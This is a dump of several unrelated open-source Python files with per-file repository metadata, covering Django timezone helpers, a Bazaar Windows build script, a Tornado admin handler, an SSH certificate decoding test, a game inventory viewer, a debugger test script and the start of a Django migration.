dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = _time.mktime(tt)
tt = _time.localtime(stamp)
return tt.tm_isdst > 0
class LocalTimezone(ReferenceLocalTimezone):
"""
Slightly improved local time implementation focusing on correctness.
It still crashes on dates before 1970 or after 2038, but at least the
error message is helpful.
"""
def _isdst(self, dt):
try:
return super(LocalTimezone, self)._isdst(dt)
except (OverflowError, ValueError) as exc:
exc_type = type(exc)
exc_value = exc_type(
"Unsupported value: %r. You should install pytz." % dt)
exc_value.__cause__ = exc
six.reraise(exc_type, exc_value, sys.exc_info()[2])
utc = pytz.utc if pytz else UTC()
"""UTC time zone as a tzinfo instance."""
# In order to avoid accessing the settings at compile time,
# wrap the expression in a function and cache the result.
_localtime = None
def get_default_timezone():
"""
Returns the default time zone as a tzinfo instance.
This is the time zone defined by settings.TIME_ZONE.
See also :func:`get_current_timezone`.
"""
global _localtime
if _localtime is None:
if isinstance(settings.TIME_ZONE, six.string_types) and pytz is not None:
_localtime = pytz.timezone(settings.TIME_ZONE)
else:
# This relies on os.environ['TZ'] being set to settings.TIME_ZONE.
_localtime = LocalTimezone()
return _localtime
# This function exists for consistency with get_current_timezone_name
def get_default_timezone_name():
"""
Returns the name of the default time zone.
"""
return _get_timezone_name(get_default_timezone())
_active = local()
def get_current_timezone():
"""
Returns the currently active time zone as a tzinfo instance.
"""
return getattr(_active, "value", get_default_timezone())
def get_current_timezone_name():
"""
Returns the name of the currently active time zone.
"""
return _get_timezone_name(get_current_timezone())
def _get_timezone_name(timezone):
"""
Returns the name of ``timezone``.
"""
try:
# for pytz timezones
return timezone.zone
except AttributeError:
# for regular tzinfo objects
return timezone.tzname(None)
# Timezone selection functions.
# These functions don't change os.environ['TZ'] and call time.tzset()
# because it isn't thread safe.
def activate(timezone):
"""
Sets the time zone for the current thread.
The ``timezone`` argument must be an instance of a tzinfo subclass or a
time zone name. If it is a time zone name, pytz is required.
"""
if isinstance(timezone, tzinfo):
_active.value = timezone
elif isinstance(timezone, six.string_types) and pytz is not None:
_active.value = pytz.timezone(timezone)
else:
raise ValueError("Invalid timezone: %r" % timezone)
def deactivate():
"""
Unsets the time zone for the current thread.
Django will then use the time zone defined by settings.TIME_ZONE.
"""
if hasattr(_active, "value"):
del _active.value
class override(object):
"""
Temporarily set the time zone for the current thread.
This is a context manager that uses ``~django.utils.timezone.activate()``
to set the timezone on entry, and restores the previously active timezone
on exit.
The ``timezone`` argument must be an instance of a ``tzinfo`` subclass, a
time zone name, or ``None``. If is it a time zone name, pytz is required.
If it is ``None``, Django enables the default time zone.
"""
def __init__(self, timezone):
self.timezone = timezone
self.old_timezone = getattr(_active, 'value', None)
def __enter__(self):
if self.timezone is None:
deactivate()
else:
activate(self.timezone)
def __exit__(self, exc_type, exc_value, traceback):
if self.old_timezone is None:
deactivate()
else:
_active.value = self.old_timezone
# Templates
def template_localtime(value, use_tz=None):
"""
Checks if value is a datetime and converts it to local time if necessary.
If use_tz is provided and is not None, that will force the value to
be converted (or not), overriding the value of settings.USE_TZ.
This function is designed for use by the template engine.
"""
should_convert = (isinstance(value, datetime)
and (settings.USE_TZ if use_tz is None else use_tz)
and not is_naive(value)
and getattr(value, 'convert_to_local_time', True))
return localtime(value) if should_convert else value
# Utilities
def localtime(value, timezone=None):
"""
Converts an aware datetime.datetime to local time.
Local time is defined by the current time zone, unless another time zone
is specified.
"""
if timezone is None:
timezone = get_current_timezone()
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
return value
def now():
"""
Returns an aware or naive datetime.datetime, depending on settings.USE_TZ.
"""
if settings.USE_TZ:
# timeit shows that datetime.now(tz=utc) is 24% slower
return datetime.utcnow().replace(tzinfo=utc)
else:
return datetime.now()
# By design, these four functions don't perform any checks on their arguments.
# The caller should ensure that they don't receive an invalid value like None.
def is_aware(value):
"""
Determines if a given datetime.datetime is aware.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is not None and value.tzinfo.utcoffset(value) is not None
def is_naive(value):
"""
Determines if a given datetime.datetime is naive.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is None or value.tzinfo.utcoffset(value) is None
def make_aware(value, timezone):
"""
Makes a naive datetime.datetime in a given time zone aware.
"""
if hasattr(timezone, 'localize'):
# available for pytz time zones
return timezone.localize(value, is_dst=None)
else:
# may be wrong around DST changes
return value.replace(tzinfo=timezone)
def make_naive(value, timezone):
"""
Makes an aware datetime.datetime naive in a given time zone.
"""
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
return value.replace(tzinfo=None)
| bsd-3-clause | -2,760,937,381,903,464,000 | 27.958991 | 81 | 0.644444 | false | 4.05477 | false | false | false |
Distrotech/bzr | tools/win32/build_release.py | 2 | 6135 | #!/cygdrive/C/Python25/python
"""A script to help automate the build process."""
# When preparing a new release, make sure to set all of these to the latest
# values.
VERSIONS = {
'bzr': '1.17',
'qbzr': '0.12',
'bzrtools': '1.17.0',
'bzr-svn': '0.6.3',
'bzr-rewrite': '0.5.2',
'subvertpy': '0.6.8',
}
# This will be passed to 'make' to ensure we build with the right python
PYTHON='/cygdrive/c/Python25/python'
# Create the final build in this directory
TARGET_ROOT='release'
DEBUG_SUBPROCESS = True
import os
import shutil
import subprocess
import sys
BZR_EXE = None
def bzr():
global BZR_EXE
if BZR_EXE is not None:
return BZR_EXE
try:
subprocess.call(['bzr', '--version'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
BZR_EXE = 'bzr'
except OSError:
try:
subprocess.call(['bzr.bat', '--version'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
BZR_EXE = 'bzr.bat'
except OSError:
raise RuntimeError('Could not find bzr or bzr.bat on your path.')
return BZR_EXE
def call_or_fail(*args, **kwargs):
"""Call a subprocess, and fail if the return code is not 0."""
if DEBUG_SUBPROCESS:
print ' calling: "%s"' % (' '.join(args[0]),)
p = subprocess.Popen(*args, **kwargs)
(out, err) = p.communicate()
if p.returncode != 0:
raise RuntimeError('Failed to run: %s, %s' % (args, kwargs))
return out
TARGET = None
def get_target():
global TARGET
if TARGET is not None:
return TARGET
out = call_or_fail([sys.executable, get_bzr_dir() + '/bzr',
'version', '--short'], stdout=subprocess.PIPE)
version = out.strip()
TARGET = os.path.abspath(TARGET_ROOT + '-' + version)
return TARGET
def clean_target():
"""Nuke the target directory so we know we are starting from scratch."""
target = get_target()
if os.path.isdir(target):
print "Deleting: %s" % (target,)
shutil.rmtree(target)
def get_bzr_dir():
return 'bzr.' + VERSIONS['bzr']
def update_bzr():
"""Make sure we have the latest bzr in play."""
bzr_dir = get_bzr_dir()
if not os.path.isdir(bzr_dir):
bzr_version = VERSIONS['bzr']
bzr_url = 'lp:bzr/' + bzr_version
print "Getting bzr release %s from %s" % (bzr_version, bzr_url)
call_or_fail([bzr(), 'co', bzr_url, bzr_dir])
else:
print "Ensuring %s is up-to-date" % (bzr_dir,)
call_or_fail([bzr(), 'update', bzr_dir])
def create_target():
target = get_target()
print "Creating target dir: %s" % (target,)
call_or_fail([bzr(), 'co', get_bzr_dir(), target])
def get_plugin_trunk_dir(plugin_name):
return '%s/trunk' % (plugin_name,)
def get_plugin_release_dir(plugin_name):
return '%s/%s' % (plugin_name, VERSIONS[plugin_name])
def get_plugin_trunk_branch(plugin_name):
return 'lp:%s' % (plugin_name,)
def update_plugin_trunk(plugin_name):
trunk_dir = get_plugin_trunk_dir(plugin_name)
if not os.path.isdir(trunk_dir):
plugin_trunk = get_plugin_trunk_branch(plugin_name)
print "Getting latest %s trunk" % (plugin_name,)
call_or_fail([bzr(), 'co', plugin_trunk,
trunk_dir])
else:
print "Ensuring %s is up-to-date" % (trunk_dir,)
call_or_fail([bzr(), 'update', trunk_dir])
return trunk_dir
def _plugin_tag_name(plugin_name):
if plugin_name in ('bzr-svn', 'bzr-rewrite', 'subvertpy'):
return '%s-%s' % (plugin_name, VERSIONS[plugin_name])
# bzrtools and qbzr use 'release-X.Y.Z'
return 'release-' + VERSIONS[plugin_name]
def update_plugin(plugin_name):
release_dir = get_plugin_release_dir(plugin_name)
if not os.path.isdir(plugin_name):
if plugin_name in ('bzr-svn', 'bzr-rewrite'):
# bzr-svn uses a different repo format
call_or_fail([bzr(), 'init-repo', '--rich-root-pack', plugin_name])
else:
os.mkdir(plugin_name)
if os.path.isdir(release_dir):
print "Removing existing dir: %s" % (release_dir,)
shutil.rmtree(release_dir)
# First update trunk
trunk_dir = update_plugin_trunk(plugin_name)
# Now create the tagged directory
tag_name = _plugin_tag_name(plugin_name)
print "Creating the branch %s" % (release_dir,)
call_or_fail([bzr(), 'co', '-rtag:%s' % (tag_name,),
trunk_dir, release_dir])
return release_dir
def install_plugin(plugin_name):
release_dir = update_plugin(plugin_name)
# at least bzrtools doesn't like you to call 'setup.py' unless you are in
# that directory specifically, so we cd, rather than calling it from
# outside
print "Installing %s" % (release_dir,)
call_or_fail([sys.executable, 'setup.py', 'install', '-O1',
'--install-lib=%s' % (get_target(),)],
cwd=release_dir)
def update_tbzr():
tbzr_loc = os.environ.get('TBZR', None)
if tbzr_loc is None:
raise ValueError('You must set TBZR to the location of tortoisebzr.')
print 'Updating %s' % (tbzr_loc,)
call_or_fail([bzr(), 'update', tbzr_loc])
def build_installer():
target = get_target()
print
print
print '*' * 60
print 'Building standalone installer'
call_or_fail(['make', 'PYTHON=%s' % (PYTHON,), 'installer'],
cwd=target)
def main(args):
import optparse
p = optparse.OptionParser(usage='%prog [OPTIONS]')
opts, args = p.parse_args(args)
update_bzr()
update_tbzr()
clean_target()
create_target()
install_plugin('subvertpy')
install_plugin('bzrtools')
install_plugin('qbzr')
install_plugin('bzr-svn')
install_plugin('bzr-rewrite')
build_installer()
if __name__ == '__main__':
main(sys.argv[1:])
# vim: ts=4 sw=4 sts=4 et ai
| gpl-2.0 | 5,361,686,361,667,223,000 | 27.781553 | 79 | 0.579136 | false | 3.336052 | false | false | false |
unclechu/avto-lux161 | avto-lux/app/adm/routes/actions.py | 1 | 14649 | # -*- coding: utf-8 -*-
import json
from warnings import warn
from tornado.web import RedirectHandler, URLSpec
from .helpers import query_except_handler, require_auth
from app.mixins.routes import JsonResponseMixin
from app.models.dbconnect import Session, db_inspector
from app.models.usermodels import User
from app.models.pagemodels import StaticPageModel, UrlMapping
from app.models.non_relation_data import NonRelationData
from app.models.catalogmodels import CatalogSectionModel, CatalogItemModel
class AdminMainHandler(JsonResponseMixin):
@require_auth
def post(self):
action = self.get_argument('action')
kwrgs = {}
try:
kwrgs = json.loads(self.get_argument('args'))
except:
kwrgs = {}
actions = {
'get_pages_list': self.get_pages_list,
'get_catalog_sections': self.get_catalog_sections,
'get_catalog_elements': self.get_catalog_elements,
'get_redirect_list': self.get_redirect_list,
'get_accounts_list': self.get_accounts_list,
'get_data_list': self.get_data_list,
'get_fields': self.get_fields,
'add': self.create, # for add new element/section forms
'update': self.update, # for editing elements/sections forms
'delete': self.delete, # for deleting elements/sections
'reorder': self.reorder # custom reordering
}
if action not in actions.keys():
return self.json_response({
'status': 'error',
'error_code': 'non_existent_action'
})
func = actions[action]
return func(**kwrgs)
@query_except_handler
def get_pages_list(self):
session = Session()
try:
result = session.execute(
StaticPageModel.get_ordered_list_query().done()
)
data = session.query(StaticPageModel).instances(result)
except Exception as e:
warn(
'adm/AdminMainHandler.get_pages_list(): '+
'cannot get static pages:\n%s' % e
)
raise e
finally:
session.close()
pages_list = [x.static_list for x in data]
for idx, page in enumerate(pages_list):
page['sort'] = idx + 1
return self.json_response({
'status': 'success',
'data_list': pages_list
})
## TODO : Optimize and using join ¯\(°_o)/¯
@query_except_handler
def get_catalog_sections(self):
session = Session()
try:
cats = session.query(CatalogSectionModel.id).all()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_catalog_sections(): ' +
'cannot get catalog sections:\n%s' % e
)
raise e
counts = []
for i in cats:
try:
count = (
session
.query(CatalogItemModel.id)
.filter_by(section_id=i[0])
.all()
)
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_catalog_sections(): ' +
'cannot get catalog items by section id #%s:\n%s' %
(str(i[0]), e)
)
raise e
counts.append((len(count),))
try:
data = session.query(
CatalogSectionModel.title,
CatalogSectionModel.id,
CatalogSectionModel.is_active
).all()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_catalog_sections(): ' +
'cannot get catalog sections:\n%s' % e
)
raise e
session.close()
return self.json_response({
'status': 'success',
'data_list': [
{
'is_active': bool(x[1][2]),
'id': x[1][1],
'title': x[1][0],
'count': x[0][0]
} for x in list(zip(counts, data))
]
})
@query_except_handler
def get_catalog_elements(self, id):
session = Session()
try:
data = session.query(
CatalogItemModel.id,
CatalogItemModel.title,
CatalogItemModel.is_active
).filter_by(section_id=id).all()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_catalog_elements(): ' +
'cannot get catalog items by section id #%s:\n%s' %
(str(id), e)
)
raise e
try:
title = session.query(
CatalogSectionModel.title
).filter_by(id=id).one()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_catalog_elements(): ' +
'cannot get catalog section by id #%s:\n%s' % (str(id), e)
)
raise e
session.close()
return self.json_response({
'status': 'success',
'section_title': title[0],
'data_list': [
{
'is_active': bool(x.is_active),
'title': x.title,
'id': x.id
} for x in data
]
})
@query_except_handler
def get_redirect_list(self):
session = Session()
try:
data = session.query(UrlMapping).all()
except Exception as e:
warn(
'adm/AdminMainHandler.get_redirect_list(): ' +
'cannot get data from UrlMapping model:\n%s' % e
)
raise e
finally:
session.close()
return self.json_response({
'status': 'success',
'data_list': [x.item for x in data]
})
@query_except_handler
def get_accounts_list(self):
session = Session()
try:
data = session.query(User).all()
except Exception as e:
warn(
'adm/AdminMainHandler.get_accounts_list(): ' +
'cannot get users:\n%s' % e
)
raise e
finally:
session.close()
return self.json_response({
'status': 'success',
'data_list': [
{
'id': x.id,
'login': x.login,
'is_active': x.is_active
} for x in data
]
})
@query_except_handler
def get_static_page(self, id):
session = Session()
try:
data = session.query(StaticPageModel).filter_by(id=id).one()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_static_page(): ' +
'cannot get static page by id #%s:\n%s' % (str(id), e)
)
raise e
session.close()
return self.json_response({
'status': 'success',
'data': data.item
})
_section_model_map = {
'pages': StaticPageModel,
'redirect': UrlMapping,
'catalog_section': CatalogSectionModel,
'catalog_element': CatalogItemModel,
'data': NonRelationData
}
_section_model_map_with_accounts = _section_model_map.copy()
_section_model_map_with_accounts['accounts'] = User
# models that support custom ordering
_custom_ordering_models = [
StaticPageModel
]
_able_to_remove_elements_models = [
User
]
@query_except_handler
def create(self, section, **fields_data):
# set as True flags that was checked
# only checked flags will be received from admin-panel front-end
fields_data.update({
key: True for key in fields_data.keys()
if key.startswith('is_') or key.startswith('has_')
})
session = Session()
Model = self._section_model_map[section]
if Model in self._custom_ordering_models:
fields_data['prev_elem'] = Model.extract_prev_elem(
session.query(Model).instances(
session.execute(
Model.get_ordered_list_query().only_last().done()
)
)
)
item = Model(**fields_data)
try:
session.add(item)
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.create(): ' +
'cannot create item by "%s" section:\n%s' % (str(section), e)
)
raise e
if section == 'redirect':
if not self._validate_redirect(fields_data):
return self.json_response({
'status': 'error',
'error_code': 'incorrect_data'
})
from app.app import application
application().handlers[0][1][:0] = [
self._get_redirect_router_item(fields_data)
]
try:
session.commit()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.create(): ' +
'cannot commit create item by "%s" section:\n%s' %
(str(section), e)
)
raise e
session.close()
return self.json_response({'status': 'success'})
@query_except_handler
def update(self, id, section, **fields_data):
Model = self._section_model_map[section]
fields = db_inspector.get_columns(Model.__tablename__)
fields_data_keys = fields_data.keys()
fields_data.update({
# set as True flags that was checked and as False that wasn't
# only checked flags will be received from admin-panel front-end
field['name']: field['name'] in fields_data_keys
for field in fields
if field['name'].startswith('is_')
or field['name'].startswith('has_')
or field['name'].startswith('inherit_seo_')
})
session = Session()
try:
data = session.query(Model).filter_by(id=id)
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.update(): ' +
'cannot update element by "%s" section:\n%s' %
(str(section), e)
)
raise e
# TODO :: Clear shitcode
if section == 'redirect':
if not self._validate_redirect(fields_data):
return self.json_response({
'status': 'error',
'error_code': 'incorrect_data'
})
from app.app import application
hndlr = application().handlers[0][1]
for idx in range(len(hndlr)):
try:
if hndlr[idx].__dict__['kwargs']['url'] == data.one().new_url:
hndlr[idx] = self._get_redirect_router_item(fields_data)
except KeyError:
continue
data.update(fields_data)
try:
session.commit()
except Exception as e:
warn(
'adm/AdminMainHandler.update(): ' +
'cannot commit update element by "%s" section:\n%s' %
(str(section), e)
)
raise e
finally:
session.close()
return self.json_response({'status': 'success'})
@query_except_handler
def delete(self, section, id):
Model = self._section_model_map_with_accounts[section]
if Model not in self._able_to_remove_elements_models:
warn(
'adm/AdminMainHandler.delete(): ' +
'model "%s" is not able to delete elements' % Model.__name__
)
return self.json_response({
'status': 'error',
'error_code': 'model_is_not_able_to_delete_elements'
})
session = Session()
# TODO :: support custom reordering
try:
session.query(Model).filter_by(id=id).delete()
session.commit()
except Exception as e:
warn(
'adm/AdminMainHandler.delete(): ' +
'cannot delete element by id #%s:\n%s' % (str(id), e)
)
return self.json_response({
'status': 'error',
'error_code': 'system_fail'
})
finally:
session.close()
return self.json_response({'status': 'success'})
@query_except_handler
def get_data_list(self):
session = Session()
try:
data = session.query(NonRelationData).all()
except Exception as e:
warn(
'adm/AdminMainHandler.get_data_list(): ' +
'cannot get non-relation data elements:\n%s' % e
)
raise e
finally:
session.close()
return self.json_response({
'status': 'success',
'data_list': [x.item for x in data]
})
@query_except_handler
def get_fields(self, section, edit=False, id=None):
session = Session()
Model = self._section_model_map_with_accounts[section]
fields = db_inspector.get_columns(Model.__tablename__)
# TODO :: refactoring
types_map = {
'BOOLEAN': 'checkbox',
'TEXT': 'html',
'VARCHAR(4096)': 'text',
'VARCHAR(8192)': 'text',
'VARCHAR(1024)': 'text',
'VARCHAR(5000)': 'password',
'JSON': 'data_fields' if section == 'data' else 'files',
'INTEGER': 'text'
}
fields_list = []
for field in fields:
try:
# ignore 'id', 'section_id' and stuff
if 'id' in field['name'] or field['name'] == 'prev_elem':
continue
field_dict = {
'name': field['name'],
'type': types_map[str(field['type'])],
'default_val': field['default']
}
if field_dict['type'] == 'files':
if field_dict['name'] == 'main_image':
field_dict['mode'] = 'single'
else:
field_dict['mode'] = 'multiple'
fields_list.append(field_dict)
except KeyError:
continue
values = None
if edit and id is not None:
try:
data = session.query(Model).filter_by(id=id).one()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_fields(): ' +
'cannot get fields by "%s" model and id #%s:\n%s' %
(Model.__name__, id, e)
)
raise e
def get_field_type_by_name(name):
for item in fields_list:
if item['name'] == name:
return item['type']
# extract values from model
def value_resolver(key, val):
field_type = get_field_type_by_name(key)
if field_type == 'files':
try:
files = json.loads(val)
assert type(files) is list
except:
files = []
return json.dumps(files)
elif field_type == 'checkbox':
if type(val) is bool:
return val
else:
return False
else:
return val
values = { k: value_resolver(k, v) for k, v in data.item.items() }
if section == 'catalog_element':
values.update({'section_id': data.section_id})
if section == 'catalog_element':
try:
sections = session.query(CatalogSectionModel).all()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_fields(): ' +
'cannot get catalog sections list:\n%s' % e
)
raise e
fields_list.append({
'name': 'section_id',
'type': 'select',
'default_val': None,
'list_values': [
{ 'title': x.title, 'value': x.id } for x in sections
]
})
session.close()
for k in ['create_date', 'last_change', '_sa_instance_state', 'password']:
try: del values[k]
except Exception: pass
return self.json_response({
'status': 'success',
'fields_list': fields_list,
'values_list': values
})
@query_except_handler
def reorder(self, section, target_id, at_id):
# TODO
# Model =
self._custom_ordering_models
if target_id == at_id:
self.json_response({'status': 'success'})
return
session = Session()
try:
# TODO :: multiple models
session.execute(
StaticPageModel
.get_reorder_page_query()
.page(target_id)
.place_before(at_id)
.done()
)
session.commit()
except Exception as e:
warn(
'adm/AdminMainHandler.reorder(): ' +
'cannot reorder "%d" at "%d":\n%s' % (target_id, at_id, e)
)
raise e
finally:
session.close()
self.json_response({'status': 'success'})
# helpers
# UrlMapping model
def _validate_redirect(self, fields_data):
try:
fields_data['status'] = int(fields_data['status']) \
if 'status' in fields_data \
and bool(fields_data['status']) \
else 300
if fields_data['status'] not in [300, 301]:
raise Exception('---invalid---')
except:
return False
return True
# UrlMapping model
def _get_redirect_router_item(self, fields_data):
return URLSpec(
pattern=fields_data['old_url'] + '$',
handler=RedirectHandler,
kwargs={
'url': fields_data['new_url'],
'permanent': fields_data['status'] == 301
},
name=None
)
| agpl-3.0 | -7,366,104,114,542,085,000 | 21.360305 | 76 | 0.617506 | false | 3.034811 | false | false | false |
etingof/pyasn1-modules | tests/test_rfc6187.py | 2 | 2505 | #
# This file is part of pyasn1-modules software.
#
# Copyright (c) 2019, Vigil Security, LLC
# License: http://snmplabs.com/pyasn1/license.html
#
import sys
import unittest
from pyasn1.codec.der.decoder import decode as der_decoder
from pyasn1.codec.der.encoder import encode as der_encoder
from pyasn1_modules import pem
from pyasn1_modules import rfc5280
from pyasn1_modules import rfc6187
class SSHClientCertificateTestCase(unittest.TestCase):
cert_pem_text = """\
MIICkDCCAhegAwIBAgIJAKWzVCgbsG5BMAoGCCqGSM49BAMDMD8xCzAJBgNVBAYT
AlVTMQswCQYDVQQIDAJWQTEQMA4GA1UEBwwHSGVybmRvbjERMA8GA1UECgwIQm9n
dXMgQ0EwHhcNMTkxMDI0MTgyNjA3WhcNMjAxMDIzMTgyNjA3WjB0MQswCQYDVQQG
EwJVUzELMAkGA1UECBMCVkExEDAOBgNVBAcTB0hlcm5kb24xEDAOBgNVBAoTB0V4
YW1wbGUxEDAOBgNVBAMTB0NoYXJsaWUxIjAgBgkqhkiG9w0BCQEWE2NoYXJsaWVA
ZXhhbXBsZS5jb20wdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARfr1XPl5S0A/BwTOm4
/rO7mGVt2Tmfr3yvYnfN/ggMvyS3RiIXSsdzcAwzeqc907Jp7Dggab0PpaOKDOxD
WoK0g6B8+kC/VMsU23mfShlb9et8qcR3A8gdU6g8uvSMahWjgakwgaYwCwYDVR0P
BAQDAgeAMB0GA1UdDgQWBBQfwm5u0GoxiDcjhDt33UJYlvMPFTAfBgNVHSMEGDAW
gBTyNds0BNqlVfK9aQOZsGLs4hUIwTATBgNVHSUEDDAKBggrBgEFBQcDFTBCBglg
hkgBhvhCAQ0ENRYzVGhpcyBjZXJ0aWZpY2F0ZSBjYW5ub3QgYmUgdHJ1c3RlZCBm
b3IgYW55IHB1cnBvc2UuMAoGCCqGSM49BAMDA2cAMGQCMGEme38A3k8q4RGSEs2D
ThQQOQz3TBJrIW8zr92S8e8BNPkRcQDR+C72TEhL/qoPCQIwGpGaC4ERiUypETkC
voNP0ODFhhlpFo6lwVHd8Gu+6hShC2PKdAfs4QFDS9ZKgQeZ
"""
def setUp(self):
self.asn1Spec = rfc5280.Certificate()
def testDerCodec(self):
ssh_eku_oids = [
rfc6187.id_kp_secureShellClient,
rfc6187.id_kp_secureShellServer,
]
substrate = pem.readBase64fromText(self.cert_pem_text)
asn1Object, rest = der_decoder(substrate, asn1Spec=self.asn1Spec)
self.assertFalse(rest)
self.assertTrue(asn1Object.prettyPrint())
self.assertEqual(substrate, der_encoder(asn1Object))
count = 0
for extn in asn1Object['tbsCertificate']['extensions']:
if extn['extnID'] == rfc5280.id_ce_extKeyUsage:
extnValue, rest = der_decoder(
extn['extnValue'], asn1Spec=rfc5280.ExtKeyUsageSyntax())
for oid in extnValue:
if oid in ssh_eku_oids:
count += 1
self.assertEqual(1, count)
suite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__])
if __name__ == '__main__':
result = unittest.TextTestRunner(verbosity=2).run(suite)
sys.exit(not result.wasSuccessful())
| bsd-2-clause | 7,143,709,270,943,653,000 | 34.785714 | 76 | 0.766866 | false | 2.328067 | true | false | false |
Gloorf/ryzom_inventory | inventory.py | 1 | 4621 | #!/usr/bin/python3
import json
from flask import Blueprint, render_template
import flask_babel
from lib import load_data, Translator, required_roles, data_need_reload
from inventory_filters import dummy_filter, filter_3, filter_4, filter_6
# Gettext hack
_ = lambda x: x
class Manager:
def __init__(self, sort_items):
self._translator = Translator('en')
self._guilds = []
self._filters = []
self._sort_items = sort_items
with open("data/guilds.json", "r") as f:
keys = json.load(f)
for k in keys:
tmp = load_data(k, self._sort_items)
tmp.api_key = k
self._guilds.append(tmp)
self.add_filter(dummy_filter)
self.current_filter = self._filters[0]
self.current_guild = None
def add_filter(self, f):
self._filters.append(f)
def refresh_guilds(self):
for g in self._guilds:
if data_need_reload(g.api_key):
g = load_data(g.api_key, self._sort_items)
def get_items(self):
items = []
pick_from = []
if self.current_guild:
pick_from = [self.current_guild]
else:
pick_from = self._guilds
for g in pick_from:
for i in g.room:
# Filter directly, quantity will be dealt later (after merge)
if self.current_filter(i):
i.origins = [(g, i.stack)]
items.append(i)
# We need to assume there's at least one item in our list of items
# If not, just return directly
if not items:
return []
# Sort our list, for a nice display (and faster merging)
items.sort()
origins = [items[0].origins[0]]
previous = items[0]
merged = []
# List is already sorted, so we can fasten up
for i in items:
if i == previous:
origins.append(i.origins[0])
else:
total_stack = sum(x[1] for x in origins)
previous.origins = origins
# Now that we merged our item, we can check quantity
if self.current_filter.quantity() < total_stack:
merged.append(previous)
origins = [i.origins[0]]
previous = i
return merged
# Used by templates
def guilds(self):
dummy = {"gid": "all", "name": _('All guilds')}
yield dummy
yield from self._guilds
# Used by templates
def filters(self):
yield from enumerate(self._filters)
# Used by templates
def tooltip(self, item):
out = self.translation(item)
for guild, number in item.origins:
out += " - {} ({})".format(guild.name, number)
return out
# Used by templates
def title(self):
if self.current_guild:
out = _('{} - {}'.format(self.current_guild.name, self.current_filter.description()))
else:
out = _('{} - {}'.format(_('All guilds'), self.current_filter.description()))
return out
def set_guild(self, id):
if id == 'all':
self.id = id
self.current_guild = None
else:
self.id = int(id)
self.current_guild = next(x for x in self._guilds if x.gid == self.id)
def set_filter(self, id):
try:
self.current_filter = self._filters[id]
except IndexError:
self.current_filter = self._filters[0]
def item_url(self, item):
total_stack = sum(x[1] for x in item.origins)
return 'http://api.ryzom.com/item_icon.php?q={0}&s={1}&sheetid={2}.sitem'.format(
item.quality, total_stack, item.sheet)
def translation(self, item):
return self._translator.translate(item)
def set_lang(self, lang):
self._translator.set_lang(lang)
def first_filter(item):
return all(x in item.tags for x in ["material", "supreme"])
inventory = Blueprint('inventory', __name__)
m = Manager(sort_items=True)
m.add_filter(filter_3)
m.add_filter(filter_4)
m.add_filter(filter_6)
@inventory.before_request
def adjust_locale_inv():
m.set_lang(str(flask_babel.get_locale()))
@inventory.route('/')
@required_roles('user')
def index():
return render_template('inventory/index.html', manager=m)
@inventory.route('/list/<guild>/<filter>/')
@required_roles('user')
def list_inventory(guild, filter):
m.refresh_guilds()
m.set_guild(guild)
m.set_filter(int(filter))
return render_template('inventory/list.html', manager=m)
| agpl-3.0 | 2,356,548,154,263,878,700 | 29.006494 | 97 | 0.565462 | false | 3.676213 | false | false | false |
SeanCline/PyExt | test/scripts/object_details.py | 1 | 1578 | import win32debug, sys, os
class D(object):
"""dict"""
def __init__(self, d1, d2):
self.d1 = d1
self.d2 = d2
def f(self):
self.d_uninitialized = 1
class S(object):
"""slots"""
__slots__ = 'slot1', 'slot2', 'slot_uninitialized'
def __init__(self, s1, s2):
self.slot1 = s1
self.slot2 = s2
class DsubD(D):
"""dict, parent dict"""
def __init__(self, d1, d2, d3):
D.__init__(self, d1, d2)
self.d3 = d3
class SsubS(S):
"""slots, parent slots"""
__slots__ = 'slot3'
def __init__(self, s1, s2, s3):
S.__init__(self, s1, s2)
self.slot3 = s3
class DsubS(S):
"""dict, parent slots"""
def __init__(self, s1, s2, d3):
S.__init__(self, s1, s2)
self.d3 = d3
class SsubD(D):
"""slots, parent dict"""
__slots__ = 'slot3'
def __init__(self, d1, d2, s3):
D.__init__(self, d1, d2)
self.slot3 = s3
class SsubDS(D, S):
"""slots, parents dict and slots"""
__slots__ = 'slot3'
def __init__(self, d1, d2, s1, s2, s3):
D.__init__(self, d1, d2)
S.__init__(self, s1, s2)
self.slot3 = s3
class NegDictOffset(tuple):
"""inheriting from tuple leads to a negative tp_dictoffset"""
def __init__(self, tupleValue):
self.attr = 'test'
d = D(1, 2)
s = S(1, 2)
dsubd = DsubD(1, 2, 3)
ssubs = SsubS(1, 2, 3)
dsubs = DsubS(1, 2, 3)
ssubd = SsubD(1, 2, 3)
ssubds = SsubDS(1, 2, 3, 4, 5)
negDictOffset = NegDictOffset((1, 2, 3))
win32debug.dump_process("object_details.dmp")
| mit | -1,804,687,212,342,609,000 | 18.725 | 65 | 0.515843 | false | 2.60396 | false | false | false |
dlancer/django-pages-cms | pages/migrations/0001_initial.py | 1 | 14896 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import markitup.fields
import mptt.fields
import django.utils.timezone
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
('auth', '0006_require_contenttypes_0002'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Page',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=200)),
('ptype', models.CharField(default='page', max_length=64, verbose_name='Type')),
